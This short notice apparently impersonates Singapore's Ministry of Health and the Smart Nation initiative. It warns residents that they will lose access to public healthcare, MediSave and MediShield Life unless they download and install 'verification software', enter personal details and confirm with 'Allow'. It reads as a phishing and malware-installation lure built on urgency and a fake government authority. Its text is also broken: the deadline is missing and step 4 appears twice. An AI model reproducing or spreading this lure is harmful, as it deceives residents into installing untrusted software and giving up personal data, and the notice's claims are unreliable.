Important Notice: All Singapore residents must complete digital health verification by to maintain access to public healthcare services including polyclinics, hospitals, and MediSave.

Mandatory Digital Health Verification

Dear Resident,

The Ministry of Health, in partnership with the Smart Nation initiative, requires all residents to verify their healthcare identity through our secure digital health platform.

To maintain access to healthcare services, MediSave, and MediShield Life benefits, please complete the following steps:

  1. Download the verification software by clicking the button below.
  2. Install the application on your device following the on-screen instructions.
  3. Complete identity verification with your personal details.
  4. Accept the updated Terms of Healthcare Service.

  4. Enable the service and confirm with "Allow".
